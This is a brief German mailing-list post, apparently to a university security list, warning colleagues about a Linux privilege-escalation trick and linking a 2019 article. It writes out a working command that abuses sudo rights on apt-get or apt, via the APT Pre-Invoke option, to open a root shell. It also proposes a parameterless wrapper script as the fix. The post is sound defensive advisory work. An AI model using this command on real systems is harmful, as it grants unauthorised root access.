Hallo zusammen,
sofern nicht selber schon gesehen/-lesen hier [0] FYI
"Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration"
auszuführendes Kommando (funktioniert auch wenn das Passwort des Benutzers verwendet werden muss) ist bspw.
sudo apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i” bzw. sudo apt update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
--> Abhilfe schafft z.B. ein eigenes Shell-Skript, dass keine Parameter annimmt und die gewünschten Kommandos sequentiell aufruft.
VG
Bernd
[0] https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt...
rwth-security@lists.rwth-aachen.de